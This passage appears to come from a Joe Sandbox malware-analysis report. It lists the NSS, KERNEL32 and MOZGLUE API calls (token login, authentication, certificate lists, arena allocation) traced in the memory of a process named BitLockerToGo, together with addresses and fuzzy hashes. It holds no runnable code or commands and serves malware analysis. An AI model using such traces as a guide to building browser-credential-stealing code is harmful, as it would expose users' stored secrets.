                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6C68B60F,00000000), ref: 6C685003
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6C68B60F,00000000), ref: 6C68501C
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,00000000,00000000,00000000,?,6C68B60F,00000000), ref: 6C68504B
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,00000000,00000000,00000000,?,6C68B60F,00000000), ref: 6C685064
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalEnterSectionUnlockValuefree
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1112172411-0
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(?), ref: 6C6B2E08
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A14C0: TlsGetValue.KERNEL32 ref: 6C6A14E0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A14C0: EnterCriticalSection.KERNEL32 ref: 6C6A14F5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A14C0: PR_Unlock.NSS3 ref: 6C6A150D
                                                                                                                                                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000400), ref: 6C6B2E1C
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6C6B2E3B
                                                                                                                                                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C6B2E95
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C6488A4,00000000,00000000), ref: 6C6A1228
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C6A1238
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C6488A4,00000000,00000000), ref: 6C6A124B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A1200: PR_CallOnce.NSS3(6C7A2AA4,6C6A12D0,00000000,00000000,00000000,?,6C6488A4,00000000,00000000), ref: 6C6A125D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C6A126F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C6A1280
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C6A128E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C6A129A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C6A12A1
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1441289343-0
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • CERT_NewCertList.NSS3 ref: 6C66ACC2
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C642F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C642F0A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C642F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C642F1D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C642AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6C640A1B,00000000), ref: 6C642AF0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C642AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C642B11
                                                                                                                                                                                                                                                                                                                                                          • CERT_DestroyCertList.NSS3(00000000), ref: 6C66AD5E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6857D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C64B41E,00000000,00000000,?,00000000,?,6C64B41E,00000000,00000000,00000001,?), ref: 6C6857E0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6857D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C685843
                                                                                                                                                                                                                                                                                                                                                          • CERT_DestroyCertList.NSS3(?), ref: 6C66AD36
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C642F50: CERT_DestroyCertificate.NSS3(?), ref: 6C642F65
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C642F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C642F83
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C66AD4F
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 132756963-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 217f92b83e5b8f7a8de1edacb318ab2fd3fd7303362d2953ea727ca8252cbb74
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 9ad6a3b3374bcaf03a958c1bec2cbccfa0abef78907807223eceb7113f7d92bf
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 217f92b83e5b8f7a8de1edacb318ab2fd3fd7303362d2953ea727ca8252cbb74
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D21C6B1D001148BEB10DF66D8055EEB7F4EF06208F558068D805B7B02FB31AA45CBEA
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C693C9E
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C693CAE
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C693CEA
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C693D02
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 284873373-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 68d91d96ad0515408d646e4174c3ec2f5746776f45084629187c605f68507004
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 52d732b70c155d04f38c0c1dd43fc32f3fa27ea9264561e01978068c60ca5f04
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 68d91d96ad0515408d646e4174c3ec2f5746776f45084629187c605f68507004
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F11D675A00605AFDB009F24DC48A9A37B8EF4A368F554071FC088B711D731ED54C7E5
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6C69F0AD,6C69F150,?,6C69F150,?,?,?), ref: 6C69ECBA
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6487ED,00000800,6C63EF74,00000000), ref: 6C6A1000
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0FF0: PR_NewLock.NSS3(?,00000800,6C63EF74,00000000), ref: 6C6A1016
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0FF0: PL_InitArenaPool.NSS3(00000000,security,6C6487ED,00000008,?,00000800,6C63EF74,00000000), ref: 6C6A102B
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6C69ECD1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: TlsGetValue.KERNEL32(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A10F3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: EnterCriticalSection.KERNEL32(?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A110C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A1141
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PR_Unlock.NSS3(?,?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A1182
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: TlsGetValue.KERNEL32(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A119C
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6C69ED02
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PL_ArenaAllocate.NSS3(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A116E
                                                                                                                                                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6C69ED5A
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2957673229-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 6fce6bc687ef580531e1b1156cd3e0731560d278c6282a850d3137b474c0890b
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E021A4B59007429BE700CF25D944B52B7E4BFA5348F15C215E81C87661EB70E994C6D8
APIs
• PK11_IsLoggedIn.NSS3(?,?), ref: 6C66C890
  • Part of subcall function 6C668F70: PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C65DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C668FAF
  • Part of subcall function 6C668F70: PR_Now.NSS3(?,?,00000002,?,?,?,6C65DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C668FD1
  • Part of subcall function 6C668F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C65DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C668FFA
  • Part of subcall function 6C668F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C65DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C669013
  • Part of subcall function 6C668F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C65DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C669042
  • Part of subcall function 6C668F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C65DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C66905A
  • Part of subcall function 6C668F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C65DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C669073
  • Part of subcall function 6C668F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C65DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C669111
• PR_GetCurrentThread.NSS3 ref: 6C66C8B2
  • Part of subcall function 6C709BF0: TlsGetValue.KERNEL32(?,?,?,6C750A75), ref: 6C709C07
• PK11_Authenticate.NSS3(?,00000001,?), ref: 6C66C8D0
• SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C66C8EB
Memory Dump Source
• Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
Similarity
• API ID: K11_Value$CriticalEnterSectionUnlock$AuthenticateCurrentInternalItem_LoggedSlotThreadUtilZfree
• String ID:
• API String ID: 999015661-0
• Opcode ID: 477a7ae121ca17423d818f87d30b67f1952193dc40be73abf14df5b980759708
• Instruction ID: 77f3591b2b928c3f3ae8cfb269284d3d1595c3d604f9488ee32516e206fbd7a3
• Opcode Fuzzy Hash: 477a7ae121ca17423d818f87d30b67f1952193dc40be73abf14df5b980759708
• Instruction Fuzzy Hash: 6901A966E015117BDB1026B76C80ABF3D699B4635CF040139FD05A7F12F761981893AB
APIs
• PR_SetError.NSS3(FFFFE09A,00000000,00000004,6C67C79F,?,?,6C695C4A,?), ref: 6C694950
  • Part of subcall function 6C698800: TlsGetValue.KERNEL32(?,6C6A085A,00000000,?,6C648369,?), ref: 6C698821
  • Part of subcall function 6C698800: TlsGetValue.KERNEL32(?,?,6C6A085A,00000000,?,6C648369,?), ref: 6C69883D
  • Part of subcall function 6C698800: EnterCriticalSection.KERNEL32(?,?,?,6C6A085A,00000000,?,6C648369,?), ref: 6C698856
  • Part of subcall function 6C698800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C698887
  • Part of subcall function 6C698800: PR_Unlock.NSS3(?,?,?,?,6C6A085A,00000000,?,6C648369,?), ref: 6C698899
• TlsGetValue.KERNEL32(?,?,?), ref: 6C69496A
• EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C69497A
• PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C694989
Memory Dump Source
• Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
Similarity
• API ID: Value$CriticalEnterSectionUnlock$CondErrorWait
• String ID:
• API String ID: 3904631464-0
• Opcode ID: 3db7893e4633d6510f01ec7fcca130c680f081fd1f677bbb99c9e67bff963921
• Instruction ID: a1833e846fff131a10026dbdd64cb101a5079a430eabbe6de254d38d4181d068
• Opcode Fuzzy Hash: 3db7893e4633d6510f01ec7fcca130c680f081fd1f677bbb99c9e67bff963921
• Instruction Fuzzy Hash: FE1108B1A042029FEB005F69EC45A6A77B8FF0736DF140135ED69D7B11EB21E814879D
APIs
• PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6C6B7FFA,?,6C6B9767,?,8B7874C0,0000A48E), ref: 6C6CEDD4
• realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6C6B7FFA,?,6C6B9767,?,8B7874C0,0000A48E), ref: 6C6CEDFD
• PORT_Alloc_Util.NSS3(?,00000000,00000000,6C6B7FFA,?,6C6B9767,?,8B7874C0,0000A48E), ref: 6C6CEE14
  • Part of subcall function 6C6A0BE0: malloc.MOZGLUE(6C698D2D,?,00000000,?), ref: 6C6A0BF8
  • Part of subcall function 6C6A0BE0: TlsGetValue.KERNEL32(6C698D2D,?,00000000,?), ref: 6C6A0C15
• memcpy.VCRUNTIME140(?,?,6C6B9767,00000000,00000000,6C6B7FFA,?,6C6B9767,?,8B7874C0,0000A48E), ref: 6C6CEE33
Memory Dump Source
• Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3903481028-0
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6C6B09B3,0000001A,?), ref: 6C6B08E9
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6A08B4
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6C6B08FD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C698D2D,?,00000000,?), ref: 6C69FB85
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C69FBB1
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_AllocItem_Util.NSS3(?,00000000,00000001), ref: 6C6B0939
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C6B0953
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$ErrorItem_$AllocAlloc_ArenaCopyFindTag_memcpy
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2572351645-0
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C698800: TlsGetValue.KERNEL32(?,6C6A085A,00000000,?,6C648369,?), ref: 6C698821
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C698800: TlsGetValue.KERNEL32(?,?,6C6A085A,00000000,?,6C648369,?), ref: 6C69883D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C698800: EnterCriticalSection.KERNEL32(?,?,?,6C6A085A,00000000,?,6C648369,?), ref: 6C698856
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C698800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C698887
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C698800: PR_Unlock.NSS3(?,?,?,?,6C6A085A,00000000,?,6C648369,?), ref: 6C698899
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3 ref: 6C694A10
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(6C68781D,?,6C67BD28,00CD52E8,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C694A24
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,6C67BD28,00CD52E8), ref: 6C694A39
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,6C67BD28,00CD52E8), ref: 6C694A4E
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Value$CriticalEnterSectionUnlock$CondErrorWait
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3904631464-0
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6C6D5F17,?,?,?,?,?,?,?,?,6C6DAAD4), ref: 6C6EAC94
                                                                                                                                                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6C6D5F17,?,?,?,?,?,?,?,?,6C6DAAD4), ref: 6C6EACA6
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6C6DAAD4), ref: 6C6EACC0
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6C6DAAD4), ref: 6C6EACDB
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: free$DestroyFreeK11_Monitor
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • CERT_DestroyCertificate.NSS3(?), ref: 6C651DFB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6495B0: TlsGetValue.KERNEL32(00000000,?,6C6600D2,00000000), ref: 6C6495D2
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6495B0: EnterCriticalSection.KERNEL32(?,?,?,6C6600D2,00000000), ref: 6C6495E7
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6495B0: PR_Unlock.NSS3(?,?,?,?,6C6600D2,00000000), ref: 6C649605
                                                                                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3 ref: 6C651E09
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709090: TlsGetValue.KERNEL32 ref: 6C7090AB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709090: TlsGetValue.KERNEL32 ref: 6C7090C9
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709090: EnterCriticalSection.KERNEL32 ref: 6C7090E5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709090: TlsGetValue.KERNEL32 ref: 6C709116
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709090: LeaveCriticalSection.KERNEL32 ref: 6C70913F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C64E190: PR_EnterMonitor.NSS3(?,?,6C64E175), ref: 6C64E19C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C64E190: PR_EnterMonitor.NSS3(6C64E175), ref: 6C64E1AA
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C64E190: PR_ExitMonitor.NSS3 ref: 6C64E208
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C64E190: PL_HashTableRemove.NSS3(?), ref: 6C64E219
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C64E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C64E231
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C64E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C64E249
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C64E190: PR_ExitMonitor.NSS3 ref: 6C64E257
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C651E37
                                                                                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3 ref: 6C651E4A
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Monitor$Enter$Value$CriticalExitSection$Arena_FreeUtil$CertificateDestroyErrorHashLeaveRemoveTableUnlock
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C651D75
                                                                                                                                                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C651D89
